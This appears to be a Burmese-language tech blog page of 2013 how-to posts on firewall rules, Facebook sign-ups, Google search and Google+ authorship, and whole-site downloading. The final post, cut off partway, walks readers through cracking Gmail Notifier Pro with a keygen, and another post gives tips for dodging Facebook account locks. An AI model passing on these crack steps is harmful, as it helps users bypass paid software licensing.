အခြားသောဏ္ဍတွေမှာ အနှောင့်အယှက်တစ်စုံတစ်ရာ ဖြစ်စေတာမျိုးရှိလာတယ်ဆိုရင် ( တစ်ကယ်တော့ မရှိပါဘူး )
အပေါ်မှာ ရိုက်သွင်းခဲ့တဲ့ကုဒ်တွေကို ပြန်ဖျက်နိုင်ပါတယ် ..
အဲဒီကုဒ်တွေကို ပြန်ဖျက်ချင်တယ်ဆိုရင်တော့ အရင်လိုပဲ Command Prompt ကို ပြန်ဖွင့်ပါ
အောက်ကကုဒ်တွေကို Command Prompt ထဲမှာ Copy to paste လုပ်ပြီး Enter ကို နှိပ်ပေးလိုက်ပါ ..

netsh advfirewall firewall delete rule name="YouTubeHack"

ဒါဆိုရင် စောစောပိုင်းက ကျွန်တော်တို့ ရိုက်သွင်းခဲ့တဲ့ Youtube ကို ပိတ်ခိုင်းထားတဲ့ Firewall ထဲက ကုဒ်တွေကို
ပြန်ဖျက်ပြီးသွားပြီ ဖြစ်ပါတယ် ...

ကဲ . .အဆင်ပြေကြပါစေဗျာ
နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

Facebook အကောင့်သစ်ဖွင့်လိုက် Lock ကျလိုက်နဲ့မို့ စိတ်ညစ်မနေပါနဲ့တော့

Posted by Unknown Rabu, 03 Juli 2013 0 komentar
Facebook ကလည်း Policy တွေ
တစ်မျိုးပြီးတစ်မျိုး ပြောင်းနေလိုက်တာ

သူပြောင်းလိုက်သမျှ Policy တွေက
International SMS ကို ပိတ်ထားတဲ့
ကျွန်တော်တို့ မြန်မာနိုင်ငံသားတွေကိုပဲ
Facebook အသုံးမပြုစေချင်တော့လို့လားတောင်
တစ်ခါတစ်ခါ စဉ်းစားမိတယ် ..

gmail ကိုတောင် ကလိမ်ကကျစ်နည်းတွေသုံးပြီး
ဖွင့်နေရတဲ့အထဲ .. အဲဒီ gmail နဲ့ Facebook အကောင့်သစ်
ဖွင့်ပစ်လိုက်တာ တစ်ခုဖွင့်လိုက် လော့ကျလိုက်
တစ်ခါတစ်ခါ ရတော့ရပါရဲ့ နောက်တစ်ကြိမ်ပြန်ဖွင့်တော့ Security
ကုဒ်တောင်းပါလေရော ..


ဒီလိုနဲ့ gmail အကောင့်တွေလည်း သမင်မွေးရင်းကျားစားရင်းဆိုသလို
သုံးမရတော့ပဲ ပုံလို့နေပြီ ..

ကျွန်တော်လည်း ဒီပြဿနာကို ဖြေရှင်းနိုင်မယ့်နည်းကို အမျိုးမျိုးစမ်းသပ်လိုက်တာ
စုစုပေါင်း gmail ၂၅ ခုလောက် ပြုတ်ပြုတ်ပြုန်း သွားပါတယ် ..

အဲဒီလို စမ်းသပ်ကြည့်တဲ့ထဲက အခုတင်ပေးလိုက်တဲ့နည်းကတော့ ရာနှုန်းပြည့်နီးပါး
အဆင်ပြေတာကို တွေ့ရပါတယ် ..

ကွန်နက်ရှင်လည်း မကောင်းလို့ စာရှည်ရှည်ရေးမပြတော့ပါဘူး ..
ဗီဒီယိုဖိုင်လေး တင်ပေးထားပါတယ် ..

ဗီဒီယိုဖိုင်နဲ့ လုပ်ပြတော့ ပိုပြီး နားလည်လွယ်တာပေါ့ ..

လိုအပ်တဲ့နေရာတွေမှာလည်း အညွန်းလေးတွေထည့်ပေးထားတာကြောင့်
အဆင်ပြေမယ်လို့ မျှော်လင့်ပါတယ် ..

ဒီနည်းလေးကို မလုပ်ခင် gmail အကောင့်ကို ကြိုတင်လုပ်ထားပါ

gmail အကောင့်ကို Free ဖွင့်တဲ့နည်းကို ဒီပို့စ် မှာ တင်ပေးထားပါတယ်

gmail အကောင့်လေးရလာပြီဆိုရင်တော့ Browser မှာရှိတဲ့ History တွေ Cookies တွေကို
အဆင်ပြေတဲ့နည်းနဲ့ ရှင်းပစ်လိုက်ပါဦး ..

အကောင်းဆုံးကတော့ အဲဒီလို History တွေ Cookies တွေ ရှင်းပြီးရင် ၀င်းဒိုးကို Restart ချပြီးမှ
Facebook အကောင့်သစ်ကို လုပ်တာပါပဲ ..

( အဆင့်တိုင်း အဆင့်တိုင်းမှာ Loading ငြိမ်အောင်တော့ စိတ်ရှည်ရှည်ထားပြီးမှ စောင့်လုပ်စေချင်တယ်)
ကဲ .. မခက်ခဲပါဘူး .. အောက်ကဗီဒီယိုလေးမှာ လေ့လာကြည့်လိုက်ပါဗျာ






ကဲ .. အဆင်ပြေပါစေဗျာ

နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

Google မှာရှာဖွေတဲ့အခါ မြန်မြန်ဆန်ဆန် ထိထိရောက်ရောက်

Posted by Unknown Jumat, 28 Juni 2013 0 komentar

post-image

ကျွန်တော်တို့တွေဟာ အကြောင်းအရာတစ်ခုခု
ဒါမှမဟုတ် ဖိုင်လေး၊ ဆော့ဝဲလေးတစ်မျိုမျိုးကို
လိုချင်တဲ့အခါ Googling လုပ်ကြရပါတယ်

အဲဒီလို google မှာ ကိုယ်လိုချင်တာကို
မွှေနှောက်ရှာဖွေတဲ့အခါ Google Search Engine ဟာ
ကျွန်တော်တို့ ရိုက်ထည့်ပြီးရှာဖွေလိုက်တဲ့ စာလုံးတွေထဲက
Keyword တွေကို ရွေးထုတ်ပြီး အဲဒီ Keyword တွေနဲ့
တိုက်ဆိုင်တဲ့ စာလုံးတွေပါတဲ့ Post တွေကို လိုက်လံရှာဖွေပါတယ်

အဲဒီလိုရှာဖွေတဲ့အခါမှာ Default အားဖြင့် Website အသီးသီးရဲ့
Post တွေထဲက ပထမဆုံး စာလုံးပေါင်း ၁၀၀ အတွင်း အဲဒီ keyword ရှိနေမနေကို ရှာဖွေပါတယ်


အဲဒီတော့ အချို့သော SEO နိုင်နင်းတဲ့ Website တွေဟာ ရှာဖွေတာအများဆုံးဖြစ်တဲ့ Keyword တွေကို
(ဥပမာ - Free, Full Version, Crack , Patch , Keygen , Serial , Download, Hack , Earn Money စတဲ့ keyword တွေကို
သူတို့တင်လိုက်တဲ့ ပို့စ်တွေတိုင်းရဲ့ ပထမဆုံး အလုံး ၁၀၀ အတွင်း ပါအောင်ထည့်ပေးထာမျိုး
ပို့စ်ခေါင်းစဉ်တိုင်းမှာ အဲဒီ Keyword တစ်ခုမဟုတ်တစ်ခုကို ပါအောင်ထည့်ပေးထာမျိုး
Website ရဲ့ Description မှာ ထည့်ရေးထားတာမျိုးတွေကို လုပ်ဆောင်ပြီး အလည်လာသူများအောင်
Page Rang တက်အောင် စီစဉ်ထားလေ့ရှိပါတယ်
( နောင်အလျဉ်းသင့်တဲ့အခါမျိုးမှာ အဲဒီအကြောင်းကို ပို့စ်ရေးတင်ပေးပါဦးမယ် )
အဲဒါကြောင့်လည်း ကိုယ်က စာလုံးအချို့ကို ရိုက်ထည့်ပြီးရှာလိုက်တဲ့အခါ ကိုယ်ရှာတဲ့စာလုံးတော့ ပါလာပါရဲ့
အဲဒီ Website ကို ၀င်ကြည့်လိုက်တဲ့အခါ ကိုယ်ရချင်တဲ့အရာနဲ့ ဘာမှမဆိုင်တဲ့ Website ကြီးဖြစ်နေတာမျိုးတွေ
မကြာခဏကြုံရလေ့ရှိပါတယ်
အဲဒီတော့ မလိုအပ်ပဲ အချိန်ကြာသွားတာတွေ သတိလက်လွတ်နဲ့ ဗိုင်းရပ်မိသွားတာမျိုးတွေ စတဲ့ စိတ်ညစ်စရာကိစ္စတွေ
ကြုံရလေ့ရှိနေတတ်ပါတယ်
ကဲ .. ဒီပို့စ်လေးမှာတော့ အဲဒီလို Googling လုပ်တဲ့အခါမှာ မြန်မြန်ဆန်ဆန်ထိထိရောက်ရောက်နဲ့ ကိုယ်ရှာလိုက်တဲ့အတိုင်း
လွဲချော်မှုအနည်းဆုံးနဲ့ Result ထွက်လာအောင်
Google ကလည်း ကိုရှာလိုက်တဲ့ Keyword ကို ရှာဖွေတဲ့အခါမှာ အခြားရှာဖွေသူတွေရဲ့
နှစ်သက်မှုအများဆုံးဖြစ်တဲ့ Website တွေကိုပဲ ကောက်နုတ်ပြီး ရှာဖွေပေးအောင် Browser မှာ Setting လုပ်ထားနိုင်တဲ့နည်းလေးကို
မျှဝေပေးမှာ ဖြစ်ပါတယ်
Mozilla Firefox ကို သုံးပြီး ရှင်းပြထားပါတယ် အခြား Browser တွေမှာလည်း ဒီနည်းကိုမှီးပြီး Setting ထဲမှာ ရှာဖွေပြုပြင်ထားနိုင်ပါတယ်
အရင်ဆုံး Firefox ကို ဖွင့်ပြီး ကြိုက်တဲ့စာလုံးတစ်လုံးကို ရိုက်ထည့်ပြီး Google မှာ ရှာလိုက်ပါ
ရှာဖွေလိုက်တဲ့စာလုံးနဲ့သက်ဆိုင်တဲ့ လင့်တွေကျလာပြီဆိုရင် အဲဒီ Page ရဲ့ ညာဖက်အပေါ်ဒေါင့်နားလေးက စက်သွားပုံလေးကိုနှိပ်ပြီး ကျလာတဲ့ထဲက Search Settings ကိုတာကို
နှိပ်ပေးလိုက်ပါ ..





အဲဒီအခါ အောက်ပုံအတိုင်း ပွင့်လာပါမယ်





အဲဒီထဲက Never show Instant results ရဲ့ရှေ့မှာ အမှတ်လေးပြောင်းတပ်လိုက်ပါ
အဲဒီအခါ အောက်က Results per page မှာ 100 Slower ကနေ 10 Faster ကို ပြောင်းသွားတာ တွေ့ရပါလိမ့်မယ်
ပြီးရင်တော့ အောက်နားလေးက Save ကို နှိပ်ပေးလိုက်ပါ
ပြီးရင် Browser ကို ပိတ်လိုက်ပါ
နောက်တစ်ကြိမ်း ကိုယ်ရှာချင်တာကို ရှာတဲ့အခါ အရင်ကထက် မြန်ဆန်သွက်လက်လာတဲ့အပြင်
အချက်အလက်တွေလည်း ပိုပြီးတိကျထိရောက်လာတာကို တွေ့ရပါလိမ့်မယ်
ကဲ .. အဆင်ပြေကြပါစေဗျာ

နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

Google Search Result မှာ ကိုယ့်ရဲ့ပုံပေါ်အောင်လုပ်နည်း

Posted by Unknown Senin, 24 Juni 2013 0 komentar
ဒီပို့စ်ကိုဖတ်မယ်ဆိုရင် စိတ်ရှည်ရှည်ထားပြီးမှ ဖတ်ဖို့ အရင်ဆုံး ကြိုတင်တောင်းပန်ထားပါရစေ
ဘာကြောင့်လည်းဆိုတော့ တော်တော်ကြီး အသေးစိပ်ရေးမှ တော်ကာကျနိုင်မယ့် နည်းပညာတစ်ခုဖြစ်နေလို့ပါ

အင်တာနက်အသုံးပြုသူတွေဟာ ကိုယ်လိုချင်တဲ့ဆော့ဝဲလေးတွေ ဒါမှမဟုတ် နည်းလမ်းလေးတွေကို google မှာရိုက်ထည့်ပြီး ရှာဖွေလေ့ရှိကြတာ သဘာဝပါ ..

ဘာကြောင့်လဲဆိုတော့ Google ကို ဆရာမတင်ပဲ နည်းပညာတစ်ခု ထဲထဲဝင်ဝင် သိလာနိုင်ဖို့ မလွယ်လို့ပါ



အဲဒီလို google ရဲ့အကူအညီနဲ့ ရှာဖွေကြတဲ့အခါ Google Search Engine ဟာ ကျွန်တော်တို့ရိုက်ထည့်လိုက်တဲ့စာလုံးတွေထဲက သက်ဆိုင်ရာ Key word တွေနဲ့ တိုက်ဆိုင်ရှာဖွေပြီး Result တွေကို ပြန်ထုတ်ပေးတာဖြစ်ပါတယ်

အဲဒီလိုပေါ်လာတဲ့ Result တွေထဲမှာ အနည်းငယ်မျှသော ပို့စ်ပိုင်ရှင်တွေရဲ့ ပို့စ်လင့်တွေမှာ အဲဒီပို့စ်ပိုင်ရှင်ရဲ့ ပုံလေးတွေ တွဲပါနေတာမျိုးကို သတိထားမိကြမှာပါ ပို့စ်နဲ့အတူတွဲပေါ်လာတဲ့ပုံကိုကြည့်ပြီး ၀င်ဖတ်သင့်မဖတ်သင့်ကို ကျွန်တော်တို့တွေရဲ့ မသိစိတ်ထဲက ဆုံးဖြတ်ချက်ချကြပါတယ်

သာမန်ပို့စ်လင့်တွေထက်စာရင် Author ရဲ့ပုံလေးနဲ့တွဲပြီးပါလာတဲ့ ပို့စ်လင့်တွေကို ၀င်ရောက်ဖတ်ရှုဖို့ကို အများဆုံးရွေးခြယ်ခံရလေ့ရှိတာဟာ အဆင်တန်ဆာအလှအပနဲ့ သက်သေသာဓက ဦးစားပေးတတ်တဲ့ လူတွေရဲ့ ရင်တွင်းဗီဇကြောင့်ပဲလို့ ပြောရမှာဖြစ်ပါတယ်
ဒါဆိုရင် Google ဟာ သူ့ရဲ့ Search Result မှာ ပို့စ်ပိုင်ရှင်အားလုံးရဲ့ ပုံတွေကိုတွဲထုတ်ပေးတာမဟုတ်ပဲ ဘာကြောင့် အချို့ရဲ့ပုံတွေကိုပဲ သက်ဆိုင်ရာပို့စ်လင့်နဲ့အတူ တွဲထုတ်ပေးတာလဲ
ဟုတ်ကဲ့ .. အဖြေကတော့ရှင်းပါတယ် .. အဲဒီပို့စ်ကိုရေးလိုက်တဲ့သူဟာ အဲဒီပုံပိုင်ရှင် အမှန်တကယ်ဖြစ်ပါတယ်လို့ google search engine က အသိအမှတ်ပြုအောင် လုပ်ထားတဲ့သူဆိုရင် Google ရဲ့ Search Result မှာ ပို့စ်လင့်နဲ့အတူ အဲဒီပို့စ်ပိုင်ရှင်ရဲ့ပုံကို ယှဉ်တွဲဖော်ပြပေးမှာ ဖြစ်ပါတယ် ..

အခုနေရာအထိ ဘာကိုပြောနေတာမှန်းမသိသေးဘူးဆိုရင် Browser ရဲ့ Address Bar မှာ ကျွန်တော့်ဘလော့ထဲက ပို့စ်နံမည်တစ်ခုခုကို ရိုက်ထည့်ပြီး ရှာကြည့်လိုက်ပါ ပေါ်လာတဲ့ Result တွေထဲမှာ အခြားသောပို့စ်တွေနဲ့အတူ ကျွန်တော့်ရဲ့ပို့စ်လင့်ကို ဖော်ပြပေးလာမှာဖြစ်ပြီး ကျွန်တော့်ပို့စ်လင့်ရဲ့ရှေ့မှာ ကျွန်တော့်ရဲ့ပုံကို ယှဉ်တွဲဖော်ပြပေးထားတာကို တွေ့ရပါလိမ့်မယ် ...

 အောက်ကပုံမှာပြထားတဲ့ Google Search Result ကို ကြည့်နိုင်ပါတယ်





ကဲ .. ဒီပို့စ်လေးမှာတော့ Google Search Result မှာ ကိုယ့်ရဲ့ပို့စ်နဲ့အတူ ကိုယ့်ရဲ့ပုံကိုပါ တွဲလျက်ဖော်ပြပေးအောင်လုပ်တဲ့ နည်းပညာလေးကို မျှဝေပေးမှာဖြစ်ပါတယ်

ဒီနည်းလမ်းအတွက် လိုအပ်တဲ့ ကြိုတင်ပြင်ဆင်မှုတွေကို အရင်ဆုံးလုပ်ထားရပါမယ် အရင်ဆုံး ကိုယ့်ရဲ့ဘလော့ကို Google မှာ Submit လုပ်ထားရပါမယ် ကိုယ့်ရဲ့ဘလော့ကို Submit လုပ်တဲ့နည်းကိုတော့ ဒီပို့စ် မှာ သွားဖတ်နိုင်ပါတယ်

ကိုယ့်ရဲ့ဘလော့ကို Google Search Engine မှာ အောင်အောင်မြင်မြင်နဲ့ Submit လုပ်ပြီးသွားပြီဆိုရင် ကိုယ့်ရဲ့ဘလော့ကို ရေးထားတဲ့ gmail အကောင့်နဲ့ Google + အကောင့်ရှိအောင်လုပ်ထားရပါမယ်

ဒါကတော့ လွယ်ပါတယ် gmail အကောင့်ထဲမှာ +You ဆိုတာကိုနှိပ်ပြီးအကောင့်လုပ်ရင်လည်းရသလို Blogger Dashboard မှာလည်း Google+ ဆိုတာလေးကိုနှိပ်လိုက်ပြီး Google+ အကောင့်လုပ်နိုင်ပါတယ်

 ကဲ .. Google+ အကောင့်ထဲကို ၀င်လိုက်ပါ Google+ မှာတင်ထားတဲ့ Profile ပုံနဲ့ Blog မှာတင်ထားတဲ့ profile ပုံကို တစ်ခုတည်းအတူတူဖြစ်အောင်လုပ်ပါ
 ပြီးတော့ အဲဒီပုံဟာလည်း ဦးခေါင်းပိုင်းနဲ့မျက်နှာကို သိသိသာသာမြင်နိုင်တဲ့ပုံမျိုးဖြစ်ရပါမယ် ( Gravator [ Globle Recoganized Avator ] ဆိုတဲ့ ကမ္ဘာက လူသားမျက်နှာလို့ အသိအမှတ်ပြုထားတဲ့ပုံမျိုးဖြစ်ရပါမယ်)

Google+ အကောင့်ထဲကို ရောက်ပြီဆိုရင် Address Bar မှာရှိတဲ့ လင့်ကို ကူးယူပါ အဲဒီလင့်ထဲက ကိုယ့် Google+ အကောင့်ရဲ့ ID ကို ကူးယူပါ
ဥပမာ - ကျွန်တော့် Google+ အကောင့်မှာရှိတဲ့လင့်က အဲဒီထဲက ကျွန်တော့်ရဲ့ ID ဖြစ်တဲ့ ကိုပဲ ကူးယူထားလိုက်ပါတယ်





 ပြီးရင် ကိုယ့်ဘလော့ကို ပြန်သွားပါ Dashboard ကနေ Pages ကိုနှိပ်ပြီး New page ကနေ blank page ကိုယူပါ Page Title မှာ ကြိုက်တာထည့်ပါ ..
ဥပမာ - ကျွန်တော်ကတော့ Reach me at ပေါ့





အဲဒီ Page မှာ HTML mode ကနေ အောက်မှာပေးထားတဲ့ကုဒ်တွေကို ထည့်ပေးပါ


<a
href="https://profiles.google.com/ဒီနေရာမှာကိုယ့်ရဲ့ G+ ID" rel="me">My Google+ Profile</a>



အောက်ပုံကို နမူနာကြည့်ပါ






အဲဒါကတော့ ကျွန်တော့်ရဲ့ Page မှာသုံးထားတဲ့ကုဒ်ပါ အပေါ်က ကုဒ်တွေကတော့ ကျွန်တော့်ရဲ့ ပုံကိုပါ ရောတင်ထားတဲ့ကုဒ်တွေပါ။ အဓိကကျတာတော့ အပြာရောင်နဲ့ ခြယ်ပြထားတဲ့ ကုဒ်တွေပါပဲ

ပြီးရင်တော့ Publish ကိုနှိပ်ပါ ပြီးသွားရင် View ကိုနှိပ်ပြီး အဲဒီ Page ရဲ့ လင့်ကိုကူးယူထားပါ (ဒီလင့်ကို သိမ်းထားပါ အောက်ကအဆင့်တစ်ခုမှာ ဒီလင့်ကို ယူသုံးမှာပါ)

 နောက်တစ်ဆင့်အနေနဲ့ကတော့ ကိုယ့်ဘလော့ရဲ့ Layout ကနေ ကြိုက်တဲ့နေရာက Add a widget ကိုယူပါ HTML/Java Script ကိုရွေးပြီး Title မှာ ဘာမှမထည့်ပဲ Content မှာ အောက်ကကုဒ်တွေကိုထည်ပေးပါ


<a
href="https://plus.google.com/
ဒီနေရာမှာ ကိုယ့်ရဲ့ G+ ID"
rel="author" target="blank">Join me on
Google+</a>



 Join me on Google+ ဆိုတဲ့စာသားနေရာမှာ ကိုယ်ကြိုက်တာပြောင်းရေးနိုင်ပါတယ် ပြီးရင်တော့ Save ကိုနှိပ်ပြီး အဲဒီ Widget ကို ထားချင်တဲ့နေရာမှာ ထားလိုက်ပါ
 ပြီးရင် .. ( စိတ်ရှည်ရှည်ထားပြီးမှ ဖတ်ပါလို့ ပြေားထားပြီးသားနော .. ဒါဗျဲ .. :) )
 ပြီးရင် Google+ အကောင့်ထဲကို ပြန်ဝင်ပါ ပြီးရင် About ကိုနှိပ်ပါ

ပွင့်လာတဲ့ထဲက အောက်ဆုံးနားလေးက Links ဆိုတဲ့ Box ရဲ့အောက်ဒေါင့်နားလေးက Edit ကိုနှိပ်ပါ





 အဲဒီ edit ဆိုတာကိုနှိပ်ပြီး ပွင့်လာတဲ့ထဲက Contributor အကွက်ထဲက နံမည်မှာကိုယ်ကြိုက်တာထည့်ပြီး လင့်မှာတော့ ကိုယ့်ဘလော့ရဲ့ About me ဆိုတဲ့ Page ရဲ့လင့်ကို ထည့်ပေးပါ

 ပြီးရင်တော့ Save ကိုနှိပ်ပေးလိုက်ပါ ပြီးရင် .. ဟဲဟဲ .. အားတောင်နာလာပြီ .. ဘလော့ရဲ့ Layout ကနေ Google+ နဲ့ဆိုင်တဲ့ Widget တွေကို အားလုံးထည့်ပေးထားပါ




အဲဒီ Widget တွေထဲက Google+ Badge ဆိုတဲ့ Widget ကို ယူတဲ့နေရာမှာတော့ အောက်ကပုံအတိုင်း
လုပ်ပေးရပါမယ်





အဲဒီပုံထဲက ကျွန်တော်မြှားပြထားတာကတော့ ကိုယ့်ရဲ့ Google+ ရဲ့ ID ကိုထည့်ပေးရမှာဖြစ်ပါတယ် ပြီးရင်တော့ အဲဒီ Widget ကို Save လုပ်လိုက်ပေါ့

ကဲ ..ဒါဆိုရင်တော့ ပြီးသွားပါပြီ
ရက်အနည်းငယ်လောက်တော့ စောင့်ရပါတယ်
ကံကောင်းရင်တော့ ချက်ချင်းရတဲ့သူအချို့ရှိပါတယ် ကျွန်တော်ကတော့ သုံးပတ်လောက်စောင့်ပြီးမှ အဆင်ပြေပါတယ်
Google Crawl လုပ်ပြီးသွားရင်တော့ Google မှာ ကိုယ့်ဘလော့ပို့စ်ရဲ့ခေါင်းစဉ်တစ်ခုခုထဲက စာလုံးအချို့ကို Search Bar မှာရိုက်ထည့်ပြီး ရှာကြည့်ပါ ..
ကိုယ့်ရေးတဲ့ပို့စ်လင့်ကျလာခဲ့ရင် ကိုယ့်ရဲ့ပုံလေးနဲ့အတူ ပေါ်နေမှာဖြစ်ပါတယ်
ပို့စ်က ရှည်လွန်းတာရယ် လုပ်ရမယ့်အဆင့်တွေက များပြားလွန်းတာရယ်ကြောင့် ဒီပို့စ်ကို ဘေးမှာထားပြီး တစ်ဆင့်ချင်းဖတ်ရင်း လုပ်နိုင်အောင်လို့ အခုပို့စ်ကိုပဲ pdf ဖိုင်လေးလုပ်ပြီး တင်ပေးထားပါမယ်
လိုချင်တဲ့သူငယ်ချင်းများ အောက်မှာဒေါင်းယူနိုင်ပါတယ်






 ကဲ .. အဆင်ပြေပါစေဗျာ

နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်းအားလုံးကို လေးစားခင်မင်လျှက် အိုင်တီမုဆိုး

Baca Selengkapnya ....

Internet Download Manager ကိုသုံးပြီး Website တစ်ခုလုံး ဒေါင်းယူနည်း

Posted by Unknown Sabtu, 08 Juni 2013 0 komentar
ကျွန်တော်တို့ဟာ တစ်ခါတစ်ခါမှာ နည်းပညာဆိုဒ်တွေကို လှည့်ပတ်လေ့လာရင်း ကိုယ့်အတွက် တစ်ဆိုဒ်လုံးနည်းပါး အသုံးဝင်တဲ့ နည်းပညာဆိုဒ်တစ်ချို့ကို အင်တာနက်ကွန်နက်ရှင်မလိုပဲ Offline လေ့လာနိုင်ဖို့ အဲဒီ Website တစ်ခုလုံးကို download ဆွဲယူထားတတ်ကြပါတယ်


အဲဒီလို Website တစ်ခုလုံးကို ဒေါင်းယူဖို့အတွက် လိုအပ်တဲ့ ဆော့ဝဲတွေကို ရှာဖွေကြရပြန်ပါတယ်

ဒီိပို့စ်မှာတော့ အင်တာနက်အသုံးပြုသူ တော်တော်များများနဲ့ ရင်းနှီးကျွမ်းဝင်ပြီးသားဖြစ်တဲ့
Internet Download Manager ကို အသုံးပြုပြီး Website တစ်ခုလုံးကို ဒေါင်းယူနိုင်မယ့်
နည်းပညာလေးတစ်ခုကို မျှဝေပေးချင်ပါတယ်




အရင်ဆုံး Internet Download Manager မရှိသေးဘူးဆိုရင် ဒီပို့စ် မှာတင်ပေးထားပါတယ်

ကဲ .. စက်ထဲမှာ Internet Download Manager ကို Install လုပ်ပြီးသွားပြီဆိုပါစို့

အရင်ဆုံး Internet Download Manager ပရိုဂရမ်ကို ဖွင့်လိုက်ပြီး
အပေါ်ဘားတန်းထဲက Grabber ကို နှိပ်လိုက်ပါ





ပြီးရင် Grabber project name အကွက်မှာ ကြိုက်တဲ့နံမည်ထည့်
Start page/address အကွက်မှာ ကိုယ်ဒေါင်းယူချင်တဲ့ဆိုဒ်ရဲ့ Home address ကိုထည့်
Custom setting မှာ the whole website ကိုရွေး
ပြီးရင် Next ကိုနှိပ်လိုက်ပါ





နောက်ထပ် Box ကိုလည်း Next ကိုနှိပ်ပေးပါ





ပြီးရင် Explore the whole site ရှေ့မှာ အမှတ်တပ် Ignore popup ရှေ့မှာ အမှတ်တပ်ပြီးရင်
Next ကိုနှိပ်လိုက်ပါ





နောက်ထပ် Box ကိုလည်း Next ကိုနှိပ်ပေးလိုက်ပါ





ဒါဆိုရင် နောက်တစ်ဆင့်မှာ အဲဒီ Website တစ်ခုလုံးကို Download ဆွဲနေတာကို တွေ့ရပါလိမ့်မယ်
ကဲ .. အဆင်ပြေကြပါစေဗျာ
နည်းပညာလမ်းကြောင်းပေါ်ကသူငယ်ချင်အားလုံးကို လေးစားခင်မင်လျှက်
အိုင်တီမုဆိုး

Baca Selengkapnya ....

Gmail Notifier Pro 5.0.1 Full Version

Posted by Unknown Senin, 03 Juni 2013 0 komentar
Gmail Notifier  ဆိုတဲ့ဆော့ဝဲကိုတော့ ကျွန်တော်တို့မြန်မာနိုင်ငံမှာ အသုံးနည်းပါတယ်

ဘာကြောင့်လဲဆိုတော့ ပိုက်ပိုက်ပေးဝယ်မှ Full Version အဖြစ် အသုံးပြုလို့ရတာရယ်
နိုင်ငံနဲ့အ၀ှမ်း အသုံးနည်းတော့ မကြားဖူးတာရယ်ကြောင့် ဖြစ်မယ်ထင်တာပါပဲ

ဒီပို့စ်မှာတော့ Gmail Notifier Pro 5.0.1 ကို ပိုက်ပိုက်မကုန်ပဲ Free သုံးနိုင်အောင် ပြန်လည်မျှဝေပေးထားပါတယ်

ပက်ပက်စက်စက်လည်း လန်းတဲ့အကြောင်း လက်တို့ပါရစေ
ဒီဆော့ဝဲလေးကို Install လုပ်ထားလိုက်ပြီး
 ပြင်ဆင်စရာရှိတာတွေကို ပြင်ဆင်ပြီးသွားပြီဆိုရင်ဖြင့်



သူငယ်ချင်းတို့ရဲ့ gmail တွေ Facebook mail တွေ Twitter mail တွေ .. အော် . mail အားလုံးနီးပါးထဲကို ၀င်လာတဲ့ mail အသစ်တွေကို ကွန်ပျူတာရဲ့ ညာဖက်အောက်ဒေါင့်လေးကနေ Noti ပြပေးမှာဖြစ်ပါတယ်
အောက်ကပုံမျိုးပေါ့














အဲဒါက Gmail အကောင့်တွေ














အဲဒါက Facebook ကတက်တဲ့ Noti တွေ ....

အဲဒီလို ကိုယ့်မှာရှိသမျှအကောင့်တွေရဲ့ ၀င်လာသမျှ မေးတွေကို အချိန်နဲ့တစ်ပြေးညီ
သိရှိနိုင်မယ် ..
အလွယ်တကူ နဲ့ Reply ပြန်နိုင်မယ် ...
နောက်ပြီးတခြား လန်းတဲ့အချက်တွေ အများကြီးပဲဗျ ... သုံးကြည့်မှ ကျွန်တော်ပြောတာထက်
ပိုပြီးများတဲ့ ကောင်းကွက်တွေ ရှိနေပါသေးလားလို့ လက်ခံလာပါလိမ့်မယ်

ကဲ . .စိတ်ဝင်စားရင် အရင်ဆုံး .. အောက်မှာ ဒေါင်းယူလိုက်ပါ






ဒေါင်းလို့ပြီးသွားရင် Full Version ဖြစ်အောင် Crack ပုံကို သေချာဖတ်ပါဦး

အရင်ဆုံး ဒေါင်းလို့ရလာတဲ့ထဲက GmailNotifierPro ဆိုတဲ့ exe ဖိုင်ကို Run ပြီး Install လုပ်လိုက်ပါ

Install လုပ်လို့ပြီးတဲ့ နောက်ဆုံးအဆင့်မှာ ပရိုဂရမ် Lunch မလုပ်စေပဲ ( မ Run စေပဲ ) ပိတ်ပစ်လိုက်ပါ
တစ်ကယ်လို့ ဒီအဆင့်မှာမေ့သွားလို့ Run သွားရင်လည်း ပရိုဂရမ်ကို ပိတ်လိုက်ပါ ပြီးရင် အောက်က ဘားတန်းထဲမှာ Gmail Notifier ရဲ့ အိုင်ကွန်လေး run နေတာကိုရှာပြီး Right Click >> Exit လုပ်ပေးပါ
( အဲဒီအိုင်ကွန်လေးက များသောအားဖြင့် အလံပုံလေးရဲ့ဘယ်ဖက်က အပေါ်မြှားဖြူဖြူလေးထဲမှာ ရှိပါတယ်)

ပြီးရင် .. ( သေသေချာချာဖတ်ပါနော် )

၁ .. gmail_not.keygen ဆိုတဲ့ဖိုင်ကို Run လိုက်ပါ အောက်ကပုံအတိုင်း ပွင့်လာပါမယ်



ပွင့်လာတဲ့ထဲက Name မှာ ကိုယ်ကြိုက်တဲ့နံမည်ထည့်ပါ
email မှာ အဲဒီထည့်ထားတဲ့နံမည်ကို စာလုံးအသေးနဲ့ @ ရဲ့ရှေ့မှထည့်ပေးပါ
ပြီးရင် Generate ကိုနှိပ်ပါ
ပြီးရင် Activate ကိုနှိပ်ပါ
ပွင့်လာတဲ့ထဲကနေ

Windows 8 မှာဆိုရင် partition C ကိုဖွင့်ပါ
Users ဆိုတဲ့ဖိုဒါကိုဖွင့်ပါ
AppData ဆိုတဲ့ဖိုဒါကိုဖွင့်ပါ
Roaming ဆိုတဲ့ဖိုဒါကိုဖွင့်ပါ
GmailNotifierPro ဆိုတဲ့ဖိုဒါကိုဖွင့်ပါ
ConfigData.xml ဆိုတဲ့ဖိုင်ကို ကလစ်နှိပ်ပြီး အောက်နားက Open ကိုနှိပ်ပေးလိုက်ပါ ( ၀င်းဒိုးမှာ Default အဖြစ်ထားတဲ့ Browser ရဲ့ အိုင်ကွန်ပုံလေးအဖြစ် တွေ့ရမှာပါ

တခြားဝင်းဒိုးတွေဆိုရင်တော့
Partition C
users
%userprofiles%  (ဒါကိုတော့ တွေချင်မှတွေ့မယ်)
Local Settings
Application Data
GmailNotifierPro အဲဒီလို ဖိုဒါတွေကို အဆင့်ဆင့်ဖွင့်ဝင်သွားပြီး
